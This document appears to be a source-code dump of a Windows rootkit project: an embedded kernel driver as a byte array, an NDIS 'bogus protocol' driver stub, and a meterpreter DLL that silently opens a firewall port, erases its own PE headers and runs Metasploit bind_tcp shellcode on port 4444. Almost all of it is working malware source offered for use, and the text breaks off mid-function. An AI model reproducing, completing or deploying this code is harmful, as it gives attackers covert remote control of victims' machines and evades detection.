0x73,0x73,0x49,0x64,0x00,0x00,0xa8,0x04,0x50,0x73,0x4c,0x6f,0x6f,0x6b,0x75,0x70, 0x54,0x68,0x72,0x65,0x61,0x64,0x42,0x79,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64, 0x00,0x00,0x25,0x05,0x52,0x74,0x6c,0x45,0x71,0x75,0x61,0x6c,0x55,0x6e,0x69,0x63, 0x6f,0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0xd2,0x06,0x5a,0x77,0x46,0x72, 0x65,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00, 0x7e,0x07,0x6d,0x65,0x6d,0x63,0x70,0x79,0x00,0x00,0x98,0x06,0x5a,0x77,0x41,0x6c, 0x6c,0x6f,0x63,0x61,0x74,0x65,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x4d,0x65,0x6d, 0x6f,0x72,0x79,0x00,0x58,0x07,0x5f,0x65,0x78,0x63,0x65,0x70,0x74,0x5f,0x68,0x61, 0x6e,0x64,0x6c,0x65,0x72,0x33,0x00,0x00,0xad,0x06,0x5a,0x77,0x43,0x6c,0x6f,0x73, 0x65,0x00,0x42,0x03,0x4b,0x65,0x55,0x6e,0x73,0x74,0x61,0x63,0x6b,0x44,0x65,0x74, 
0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0xb7,0x02,0x4b,0x65, 0x44,0x65,0x6c,0x61,0x79,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x48,0x03,0x4b,0x65,0x57,0x61,0x69,0x74,0x46,0x6f, 0x72,0x53,0x69,0x6e,0x67,0x6c,0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xe8,0x02, 0x4b,0x65,0x49,0x6e,0x73,0x65,0x72,0x74,0x51,0x75,0x65,0x75,0x65,0x41,0x70,0x63, 0x00,0x00,0xd5,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65, 0x41,0x70,0x63,0x00,0x39,0x03,0x4b,0x65,0x53,0x74,0x61,0x63,0x6b,0x41,0x74,0x74, 0x61,0x63,0x68,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x00,0x05,0x07,0x5a,0x77, 0x51,0x75,0x65,0x72,0x79,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e, 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0x34,0x04,0x4f,0x62,0x4f,0x70,0x65,0x6e, 0x4f,0x62,0x6a,0x65,0x63,0x74,0x42,0x79,0x50,0x6f,0x69,0x6e,0x74,0x65,0x72,0x00, 0xd9,0x02,0x4b,0x65,0x49,0x6e,0x69,0x74,0x69,0x61,0x6c,0x69,0x7a,0x65,0x45,0x76, 0x65,0x6e,0x74,0x00,0x54,0x05,0x52,0x74,0x6c,0x47,0x65,0x74,0x56,0x65,0x72,0x73, 0x69,0x6f,0x6e,0x00,0x6a,0x00,0x45,0x78,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65, 0x50,0x6f,0x6f,0x6c,0x00,0x00,0x9b,0x03,0x4d,0x6d,0x4d,0x61,0x70,0x4c,0x6f,0x63, 0x6b,0x65,0x64,0x50,0x61,0x67,0x65,0x73,0x53,0x70,0x65,0x63,0x69,0x66,0x79,0x43, 0x61,0x63,0x68,0x65,0x00,0x00,0xef,0x04,0x52,0x74,0x6c,0x43,0x6f,0x6d,0x70,0x61, 0x72,0x65,0x4d,0x65,0x6d,0x6f,0x72,0x79,0x00,0x00,0x88,0x07,0x73,0x74,0x72,0x63, 0x6d,0x70,0x00,0x00,0x84,0x07,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x69,0x04, 0x50,0x73,0x43,0x72,0x65,0x61,0x74,0x65,0x53,0x79,0x73,0x74,0x65,0x6d,0x54,0x68, 0x72,0x65,0x61,0x64,0x00,0x00,0x8a,0x07,0x73,0x74,0x72,0x6c,0x65,0x6e,0x00,0x00, 0x89,0x07,0x73,0x74,0x72,0x63,0x70,0x79,0x00,0x00,0x31,0x03,0x4b,0x65,0x53,0x65, 0x74,0x53,0x79,0x73,0x74,0x65,0x6d,0x41,0x66,0x66,0x69,0x6e,0x69,0x74,0x79,0x54, 0x68,0x72,0x65,0x61,0x64,0x00,0xb0,0x04,0x50,0x73,0x52,0x65,0x6d,0x6f,0x76,0x65, 
0x4c,0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52, 0x6f,0x75,0x74,0x69,0x6e,0x65,0x00,0x00,0xbf,0x04,0x50,0x73,0x53,0x65,0x74,0x4c, 0x6f,0x61,0x64,0x49,0x6d,0x61,0x67,0x65,0x4e,0x6f,0x74,0x69,0x66,0x79,0x52,0x6f, 0x75,0x74,0x69,0x6e,0x65,0x00,0x12,0x07,0x5a,0x77,0x51,0x75,0x65,0x72,0x79,0x53, 0x79,0x73,0x74,0x65,0x6d,0x49,0x6e,0x66,0x6f,0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e, 0x00,0x00,0x40,0x05,0x52,0x74,0x6c,0x46,0x72,0x65,0x65,0x55,0x6e,0x69,0x63,0x6f, 0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0xdb,0x04,0x52,0x74,0x6c,0x41, 0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x54,0x6f,0x55,0x6e,0x69,0x63,0x6f, 0x64,0x65,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x00,0x5b,0x05,0x52,0x74,0x6c,0x49, 0x6e,0x69,0x74,0x41,0x6e,0x73,0x69,0x53,0x74,0x72,0x69,0x6e,0x67,0x00,0x6e,0x74, 0x6f,0x73,0x6b,0x72,0x6e,0x6c,0x2e,0x65,0x78,0x65,0x00,0x00,0x80,0x01,0x4e,0x64, 0x69,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63, 0x6f,0x6c,0x00,0x00,0x69,0x00,0x4e,0x64,0x69,0x73,0x44,0x65,0x72,0x65,0x67,0x69, 0x73,0x74,0x65,0x72,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x00,0x00,0xb8,0x00, 0x4e,0x64,0x69,0x73,0x47,0x65,0x74,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x00,0x00, 0x4e,0x44,0x49,0x53,0x2e,0x53,0x59,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0xa4,0x3e,0xa8,0x3e,0x00,0x10,0x00,0x00, 0xf8,0x00,0x00,0x00,0x48,0x30,0x50,0x30,0x7b,0x30,0x82,0x30,0x89,0x30,0x90,0x30, 0x97,0x30,0x9e,0x30,0xa5,0x30,0xac,0x30,0xb3,0x30,0xba,0x30,0xc1,0x30,0xc8,0x30, 0xcf,0x30,0xd6,0x30,0xdd,0x30,0xe2,0x30,0xec,0x30,0x03,0x31,0x0d,0x31,0x1c,0x31, 0x2d,0x31,0x46,0x31,0x55,0x31,0x60,0x31,0x66,0x31,0x8f,0x31,0xab,0x31,0x52,0x33, 0x5a,0x33,0xb4,0x33,0xc5,0x33,0xcb,0x33,0xfa,0x33,0x63,0x34,0x96,0x34,0xb2,0x34, 0xc4,0x34,0xdd,0x34,0xef,0x34,0x22,0x35,0x3e,0x35,0x6d,0x35,0x86,0x35,0x8b,0x35, 0xd9,0x35,0xef,0x35,0xe6,0x36,0x0a,0x37,0x15,0x37,0x46,0x37,0x4b,0x37,0x8b,0x37, 
0xac,0x37,0xbe,0x37,0xd9,0x37,0x31,0x38,0x45,0x38,0x71,0x38,0x87,0x38,0x69,0x39, 0x81,0x39,0x93,0x39,0xa6,0x39,0xc0,0x39,0xed,0x39,0xf3,0x39,0x04,0x3a,0x19,0x3a, 0x36,0x3a,0x3d,0x3a,0x50,0x3a,0x6f,0x3a,0x88,0x3a,0x92,0x3a,0x9d,0x3a,0x0f,0x3b, 0x18,0x3b,0x23,0x3b,0x8f,0x3b,0x98,0x3b,0xa3,0x3b,0xdc,0x3b,0xff,0x3b,0x09,0x3c, 0x2a,0x3c,0x34,0x3c,0x4e,0x3c,0x7c,0x3c,0x88,0x3c,0x92,0x3c,0xb0,0x3c,0xba,0x3c, 0xc5,0x3c,0xd7,0x3c,0xdd,0x3c,0xee,0x3c,0xf4,0x3c,0x06,0x3d,0x1b,0x3d,0x30,0x3d, 0x36,0x3d,0x40,0x3d,0x4a,0x3d,0x54,0x3d,0x5e,0x3d,0x68,0x3d,0x72,0x3d,0x7c,0x3d, 0x96,0x3d,0x9b,0x3d,0x17,0x3e,0x44,0x3e,0x8c,0x3e,0xcb,0x3e,0x0c,0x3f,0x6e,0x3f, 0x9b,0x3f,0xd1,0x3f,0x00,0x20,0x00,0x00,0xf4,0x00,0x00,0x00,0x10,0x30,0x51,0x30, 0xba,0x30,0x57,0x31,0x6c,0x31,0x78,0x31,0xbb,0x31,0xc5,0x31,0xe2,0x31,0x09,0x32, 0x1a,0x32,0x21,0x33,0x26,0x33,0x33,0x33,0x45,0x33,0x4e,0x33,0x56,0x33,0x5d,0x33, 0x63,0x33,0xb7,0x34,0xc6,0x34,0x10,0x35,0x27,0x35,0x3d,0x35,0x52,0x35,0x65,0x35, 0x70,0x35,0xb5,0x35,0xc2,0x35,0xda,0x35,0xec,0x35,0x05,0x36,0x16,0x36,0x55,0x36, 0x5b,0x36,0x70,0x36,0x83,0x36,0x89,0x36,0xc8,0x36,0xd7,0x36,0x34,0x37,0x3d,0x37, 0x51,0x37,0x58,0x37,0x5e,0x37,0x6f,0x37,0x7d,0x37,0x82,0x37,0x88,0x37,0x9a,0x37, 0x30,0x3b,0x3e,0x3b,0x6a,0x3b,0x82,0x3b,0xb7,0x3b,0xd1,0x3b,0xe4,0x3b,0xea,0x3b, 0xf0,0x3b,0xf6,0x3b,0xfc,0x3b,0x02,0x3c,0x08,0x3c,0x0e,0x3c,0x14,0x3c,0x1a,0x3c, 0x20,0x3c,0x26,0x3c,0x2c,0x3c,0x32,0x3c,0x38,0x3c,0x3e,0x3c,0x44,0x3c,0x4a,0x3c, 0x50,0x3c,0x56,0x3c,0x5c,0x3c,0x62,0x3c,0x68,0x3c,0x6e,0x3c,0x74,0x3c,0x7a,0x3c, 0x80,0x3c,0x86,0x3c,0x8c,0x3c,0x92,0x3c,0x98,0x3c,0x9e,0x3c,0xa4,0x3c,0xaa,0x3c, 0xb0,0x3c,0xb6,0x3c,0xbc,0x3c,0xc2,0x3c,0xc8,0x3c,0xce,0x3c,0xd4,0x3c,0xda,0x3c, 0xe4,0x3c,0xe8,0x3c,0xf4,0x3c,0xf8,0x3c,0x08,0x3d,0xa4,0x3d,0xa8,0x3d,0xac,0x3d, 0xb0,0x3d,0xb4,0x3d,0xb8,0x3d,0xbc,0x3d,0x97,0x3e,0xaa,0x3e,0xbf,0x3e,0xee,0x3e, 0xfd,0x3e,0x18,0x3f,0xc2,0x3f,0x00,0x00,0x00,0x30,0x00,0x00,0x6c,0x00,0x00,0x00, 
0x2d,0x30,0xf8,0x30,0x60,0x31,0x6a,0x31,0x8d,0x31,0xd9,0x31,0xea,0x31,0x00,0x32, 0x16,0x32,0x48,0x32,0x57,0x32,0x74,0x32,0x11,0x36,0x1b,0x36,0x20,0x36,0x2a,0x36, 0x31,0x36,0x38,0x36,0x3f,0x36,0x46,0x36,0x4d,0x36,0x54,0x36,0x5b,0x36,0x62,0x36, 0x69,0x36,0x70,0x36,0x92,0x36,0xa2,0x36,0xff,0x36,0x0f,0x37,0x2c,0x37,0x5d,0x37, 0x6d,0x37,0xa0,0x37,0xd4,0x37,0xe7,0x37,0x17,0x38,0x3b,0x38,0x52,0x38,0x5e,0x38, 0xae,0x38,0xb9,0x38,0xc4,0x38,0xe0,0x38,0xe6,0x38,0xf3,0x38,0x0a,0x39,0x1b,0x39, 0x39,0x39,0x00,0x00,0x00,0x40,0x00,0x00,0x14,0x00,0x00,0x00,0x7e,0x3f,0x91,0x3f, 0xa6,0x3f,0xb7,0x3f,0xd6,0x3f,0xf7,0x3f,0x00,0x50,0x00,0x00,0x58,0x00,0x00,0x00, 0x2e,0x30,0x33,0x30,0x4f,0x30,0x5b,0x30,0x68,0x30,0x6e,0x30,0x78,0x30,0x89,0x30, 0x92,0x30,0xa5,0x30,0xab,0x30,0xbe,0x30,0xc4,0x30,0xd9,0x30,0xe3,0x30,0xe9,0x30, 0xfd,0x30,0x03,0x31,0x18,0x31,0x29,0x31,0x3f,0x31,0x49,0x31,0x63,0x31,0x76,0x31, 0x81,0x31,0x95,0x31,0xd5,0x31,0xe6,0x31,0xfb,0x31,0x0c,0x32,0x15,0x32,0xb4,0x32, 0x76,0x33,0x85,0x33,0x08,0x34,0x52,0x34,0x7c,0x34,0x87,0x34,0xde,0x34,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; ================================================ FILE: src/meterpreter/dllmain.cpp ================================================ #include "stdafx.h" #include "../meterpreter_config.h" #pragma comment(linker,"/ENTRY:DllMain") #pragma comment(linker,"/NODEFAULTLIB") //-------------------------------------------------------------------------------------- DWORD WINAPI ShellcodeThread(LPVOID lpParam) { typedef DWORD (WINAPI * SHELLCODE)(void); SHELLCODE Shellcode = (SHELLCODE)lpParam; // call shellcode return Shellcode(); } //-------------------------------------------------------------------------------------- DWORD WINAPI MainThread(LPVOID lpParam) { DWORD dwExit = 0; DbgMsg( __FILE__, 
__LINE__, __FUNCTION__"(): Thread %x:%x started\n", GetCurrentProcessId(), GetCurrentThreadId() ); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Adding firewall rule for TCP port %d...\n", LISTEN_PORT); // add firewall rule to allow connections on meterpreter port char szCommandLine[MAX_PATH]; wsprintf(szCommandLine, "cmd.exe /C netsh firewall add portopening TCP %d " FIREWALL_RULE_NAME, LISTEN_PORT); UINT ExitCode = WinExec(szCommandLine, SW_HIDE); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Done (exit code: %d)\n", ExitCode); // allocate memory for shellcode PVOID Buff = VirtualAlloc(NULL, sizeof(PAYLOAD), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (Buff) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): Allocated %d bytes for payload at 0x%x\n", sizeof(PAYLOAD), Buff ); // copy shellcode RtlCopyMemory(Buff, PAYLOAD, sizeof(PAYLOAD)); // run payload in separate thread HANDLE hThread = CreateThread(NULL, 0, ShellcodeThread, Buff, 0, NULL); if (hThread) { WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); } else { DbgMsg(__FILE__, __LINE__, "CreateThread() ERROR %d\n", GetLastError()); } VirtualFree(Buff, 0, MEM_RELEASE); } else { DbgMsg(__FILE__, __LINE__, "VirtualAlloc() ERROR %d\n", GetLastError()); } // delete firewall rule DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Deleting firewall rule...\n"); ExitCode = WinExec("cmd.exe /C netsh advfirewall firewall delete rule name=" FIREWALL_RULE_NAME, SW_HIDE); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): Done (exit code: %d)\n", ExitCode); DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): EXIT\n"); #ifdef _X86_ // free DLL image and exit current thread __asm { push dwExit /* argument for ExitThread() */ push MEM_RELEASE push 0 push lpParam /* address to free */ push dword ptr [ExitThread] /* ExitThread() as return address from VirtualFree() */ mov eax, dword ptr [VirtualFree] jmp eax } #else // _X86_ #error __FUNCTION__ is x86 only #endif // _X86_ return dwExit; } 
//-------------------------------------------------------------------------------------- void my_memset(void *mem, unsigned char val, size_t size) { for (size_t i = 0; i < size; i++) { ((unsigned char *)mem)[i] = i; } for (size_t i = 0; i < size; i++) { ((unsigned char *)mem)[i] ^= i; ((unsigned char *)mem)[i] += val; } } //-------------------------------------------------------------------------------------- BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { char szProcessPath[MAX_PATH], szProcessUser[MAX_PATH]; DWORD dwUserLen = MAX_PATH; GetModuleFileName(GetModuleHandle(NULL), szProcessPath, MAX_PATH); GetUserName(szProcessUser, &dwUserLen); DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): Injected into process \"%s\" (PID=%d), User = \"%s\"\n", szProcessPath, GetCurrentProcessId(), szProcessUser ); PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32) ((PUCHAR)hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew); DWORD dwOldProt = 0; if (VirtualProtect(hModule, pHeaders->OptionalHeader.SizeOfHeaders, PAGE_READWRITE, &dwOldProt)) { // erase image headers my_memset(hModule, 0, pHeaders->OptionalHeader.SizeOfHeaders); } // run payload in separate thread HANDLE hThread = CreateThread(NULL, 0, MainThread, (PVOID)hModule, 0, NULL); if (hThread) { CloseHandle(hThread); } else { DbgMsg(__FILE__, __LINE__, "CreateThread() ERROR %d\n", GetLastError()); } break; } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: { break; } } return TRUE; } //-------------------------------------------------------------------------------------- void Dummy(void) { MessageBox(0, " to exit...", __FUNCTION__"()", MB_ICONINFORMATION); ExitProcess(0); } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/meterpreter/meterpreter.cpp ================================================ // 
meterpreter.cpp : Defines the exported functions for the DLL application. // #include "stdafx.h" ================================================ FILE: src/meterpreter/meterpreter.def ================================================ EXPORTS Dummy ================================================ FILE: src/meterpreter/meterpreter.vcproj ================================================ ================================================ FILE: src/meterpreter/post_build.bat ================================================ @echo off if exist ..\meterpreter_debug.dll ..\bin2c.exe ..\meterpreter_debug.dll dll > ..\includes\meterpreter_debug.dll.h if exist ..\meterpreter.dll ..\bin2c.exe ..\meterpreter.dll dll > ..\includes\meterpreter.dll.h pause ================================================ FILE: src/meterpreter/stdafx.cpp ================================================ // stdafx.cpp : source file that includes just the standard includes // meterpreter.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h" // TODO: reference any additional headers you need in STDAFX.H // and not in this file ================================================ FILE: src/meterpreter/stdafx.h ================================================ #pragma once #include "targetver.h" #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers #include #include "../common/debug.h" ================================================ FILE: src/meterpreter/targetver.h ================================================ #pragma once // The following macros define the minimum required platform. The minimum required platform // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run // your application. The macros work by enabling all features available on platform versions up to and // including the version specified. 
// Modify the following defines if you have to target a platform prior to the ones specified below. // Refer to MSDN for the latest info on corresponding values for different platforms. #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. #define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows. #endif #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. #endif #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98. #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later. #endif #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0. #define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE. #endif ================================================ FILE: src/meterpreter_bind_tcp.h ================================================ /* * windows/meterpreter/bind_tcp - 298 bytes (stage 1) * http://www.metasploit.com * VERBOSE=false, LPORT=4444, RHOST=, EXITFUNC=thread, * AutoLoadStdapi=true, InitialAutoRunScript=, AutoRunScript=, * AutoSystemInfo=true, EnableUnicodeEncoding=true */ unsigned char bind_tcp_stage_1[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31" "\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53" "\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" "\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff" "\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" "\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"; ================================================ FILE: src/meterpreter_config.h ================================================ /** * Payload that should use to build DLL for injection * into the user-mode process. */ #include "meterpreter_bind_tcp.h" #define PAYLOAD bind_tcp_stage_1 #define LISTEN_PORT 4444 #define FIREWALL_RULE_NAME "System" ================================================ FILE: src/rootkit.sln ================================================  Microsoft Visual Studio Solution File, Format Version 10.00 # Visual Studio 2008 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rootkit_installer", "rootkit_installer\rootkit_installer.vcproj", "{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}" ProjectSection(ProjectDependencies) = postProject {3EEAAF60-1BCB-4114-8B75-168421CD9253} = {3EEAAF60-1BCB-4114-8B75-168421CD9253} EndProjectSection EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rootkit_driver", "rootkit_driver\rootkit_driver.vcproj", "{3EEAAF60-1BCB-4114-8B75-168421CD9253}" ProjectSection(ProjectDependencies) = postProject {07D07B92-3F3F-4054-B224-E9D8324F1FAD} = {07D07B92-3F3F-4054-B224-E9D8324F1FAD} EndProjectSection EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "meterpreter", "meterpreter\meterpreter.vcproj", 
"{07D07B92-3F3F-4054-B224-E9D8324F1FAD}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Win32 = Debug|Win32 Release|Win32 = Release|Win32 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.ActiveCfg = Debug|Win32 {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Debug|Win32.Build.0 = Debug|Win32 {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.ActiveCfg = Release|Win32 {8A5187B5-EA41-4C34-8D5B-4213A281AAFB}.Release|Win32.Build.0 = Release|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.ActiveCfg = Debug|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Debug|Win32.Build.0 = Debug|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.ActiveCfg = Release|Win32 {3EEAAF60-1BCB-4114-8B75-168421CD9253}.Release|Win32.Build.0 = Release|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.ActiveCfg = Debug|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Debug|Win32.Build.0 = Debug|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.ActiveCfg = Release|Win32 {07D07B92-3F3F-4054-B224-E9D8324F1FAD}.Release|Win32.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal ================================================ FILE: src/rootkit_driver/bogusproto.cpp ================================================ #include "stdafx.h" // NDIS version: 5.1 #define NDIS51 1 extern "C" { #include } NDIS_HANDLE m_hBogusProtocol = NULL; //-------------------------------------------------------------------------------------- VOID OnBindAdapter( PNDIS_STATUS Status, NDIS_HANDLE BindContext, PNDIS_STRING DeviceNAme, PVOID SystemSpecific1, PVOID SystemSpecific2) { /* This function is a required driver function to support Plug and Play. 
*/ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnOpenAdapterComplete( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS Status, NDIS_STATUS OpenErrorStatus) { /* This function is a required driver function that completes processing of a binding operation for which NdisOpenAdapter returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnUnbindAdapter( PNDIS_STATUS Status, NDIS_HANDLE ProtocolBindingContext, NDIS_HANDLE UnbindContext) { /* This function is a required function to support Plug and Play. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnUnload(VOID) { #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnCloseAdapterComplete( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS Status) { /* This function is a required driver function that completes processing for an unbinding operation for which NdisCloseAdapter returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnResetComplete( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS Status) { /* This function is a required driver function that completes a protocol-initiated reset operation for which NdisReset returned NDIS_STATUS_PENDING. 
*/ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnRequestComplete( NDIS_HANDLE ProtocolBindingContext, PNDIS_REQUEST NdisRequest, NDIS_STATUS Status) { /* This function is a required driver function that completes the processing of a protocol-initiated query or set for which NdisRequest returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnStatus( NDIS_HANDLE ProtocolBindingContext, NDIS_STATUS GeneralStatus, PVOID StatusBuffer, UINT StatusBufferSize) { /* This function is a required driver function that handles status-change notifications raised by an underlying connectionless network adapter driver or by NDIS. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnStatusComplete(NDIS_HANDLE ProtocolBindingContext) { /* This function is a required driver function that completes a status-change operation initiated when the underlying driver called NdisMIndicateStatus. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnSendComplete( NDIS_HANDLE ProtocolBindingContext, PNDIS_PACKET Packet, NDIS_STATUS Status) { /* This function is a required driver function that completes the processing of a protocol-initiated send previously passed to NdisSendPackets or NdisSend, which returned NDIS_STATUS_PENDING. 
*/ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- VOID OnTransferDataComplete( NDIS_HANDLE ProtocolBindingContext, PNDIS_PACKET Packet, NDIS_STATUS Status, UINT BytesTransferred) { /* This function is a required driver function if the protocol might bind itself to an underlying connectionless network adapter driver that does not indicate full-packet receives with NdisMIndicateReceivePacket. ProtocolTransferDataComplete completes the processing of a protocol-initiated transfer-data request for which NdisTransferData returned NDIS_STATUS_PENDING. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif } //-------------------------------------------------------------------------------------- NDIS_STATUS OnReceive( NDIS_HANDLE ProtocolBindingContext, NDIS_HANDLE MacReceiveContext, PVOID HeaderBuffer, UINT HeaderBufferSize, PVOID LookAheadBuffer, UINT LookAheadBufferSize, UINT PacketSize) { /* This function is a required driver function in NDIS protocols that bind themselves to connectionless network adapter drivers. ProtocolReceive determines whether a received network packet is of interest to the protocol's clients and, if so, copies the indicated data and, possibly, calls NdisTransferData to retrieve the rest of the indicated packet. */ #ifdef DBG_NDIS_PROT DbgMsg(__FUNCTION__"() called\n"); #endif return 